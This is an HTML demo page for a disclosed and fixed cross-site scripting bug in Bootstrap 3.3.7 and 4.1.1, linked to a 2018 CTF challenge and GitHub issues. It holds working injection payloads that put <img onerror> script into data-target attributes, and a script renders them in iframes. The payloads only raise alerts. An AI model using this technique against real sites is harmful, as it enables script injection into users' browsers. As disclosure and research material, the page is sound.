Excess Ess 2
<html>
<head>
</head>
<body>
<style type="text/css">
body {
margin: 0;
}
a {
color: #007bff;
text-decoration: none;
background-color: transparent;
}
* {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif;
}
textarea {
width: 100%;
height: 300px;
border: 1px solid #ccc;
border-radius: 0.5rem;
padding: 1rem;
font-family: Consolas, monospace;
resize: none;
font-size: 1rem;
}
iframe {
width: 50%;
margin: 0;
border: none;
float: left;
}
body>div {
width: 50%;
float: left;
box-sizing: border-box;
padding: 1rem;
}
body>h1, p {
margin: 0;
padding: 1rem;
}
p { line-height: 180%; }
body h2 {
margin: 1rem;
}
h1, h2 {
font-weight: 500;
}
</style>
<h1>Bootstrap XSS</h1>
<p>
Further to <a href="https://github.com/twbs/bootstrap/issues/20184">Issue #20184</a>, and an exploit for SecurityFest CTF (2018) - Excess Ess 2 by @avlidienbrunn.
<br/>
It was reported (2018-05-30) in
<a href="https://github.com/twbs/bootstrap/issues/26625">#26625</a>,
<a href="https://github.com/twbs/bootstrap/issues/26627">#26627</a>,
<a href="https://github.com/twbs/bootstrap/issues/26628">#26628</a>
by
<a href="https://github.com/1Jesper1">@1Jesper1</a>,
and fixed (2018-06-01) in
<a href="https://github.com/twbs/bootstrap/pull/26630">#26630</a>
by <a href="https://github.com/Johann-S">@Johann-S</a>.
</p>
<div>
<h2>v4</h2>
<textarea id=v4>
<html><head>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<meta data-spy=scroll
data-target="<img src=a: onerror=alert('hello_from_v4');alert=1>"></textarea>
</div>
<div>
<h2>v3</h2>
<textarea id=v3>
<html><head>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<meta data-spy=affix
data-target="<img src=a: onerror=alert('hello_from_v3')>"></textarea>
</div>
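<script>
// Render each textarea's markup in its own iframe so the v4 and v3
// test cases run side by side, each loading its own Bootstrap build.
var textarea = document.getElementsByTagName('textarea');
// Reuse this page's stylesheet inside the iframes.
var css = document.getElementsByTagName('style')[0].outerHTML;
for (var i = 0; i < textarea.length; i++) {
  var iframe = document.createElement('iframe');
  // srcdoc = stylesheet + test case markup + a heading naming the case (from the textarea id).
  iframe.srcdoc = css + textarea[i].value + '<h1>' + textarea[i].id + ' test</h1>';
  document.body.appendChild(iframe);
}
</script>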
</body>
</html>